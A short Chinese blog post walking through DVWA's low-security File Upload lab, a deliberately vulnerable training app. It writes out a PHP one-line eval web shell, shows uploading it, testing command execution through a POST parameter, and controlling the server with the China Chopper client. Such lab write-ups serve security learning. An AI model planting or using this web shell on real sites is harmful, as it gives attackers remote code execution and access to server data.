File Upload (low)
04-15
沒什麼寫的,做一個簡單的這個shell吧,對於今後的學習還是很重要的。
瀏覽器中輸入localhost/DVWA進入DVWA,點擊File Upload的選項。
創建記事本編寫一句話木馬:<?php @eval($_POST[pass]);?> (我的文件命名為super.php)
使用php一句話木馬,上傳文件:
然後打開文件的所在界面,使用hackbar功能上傳數據。
在傳入數據中傳入pass=echo』hello』; 成功顯示出來。
一句話木馬成功起效。
使用中國菜刀
獲得成功,獲得伺服器的數據。
QQ:1424638006
推薦閱讀:
※《信息安全之細水長流》基礎三
※繞過PowerShell 執行策略的15種方法
※如何通過EW做Socks5代理進行內網滲透
TAG:滲透測試 |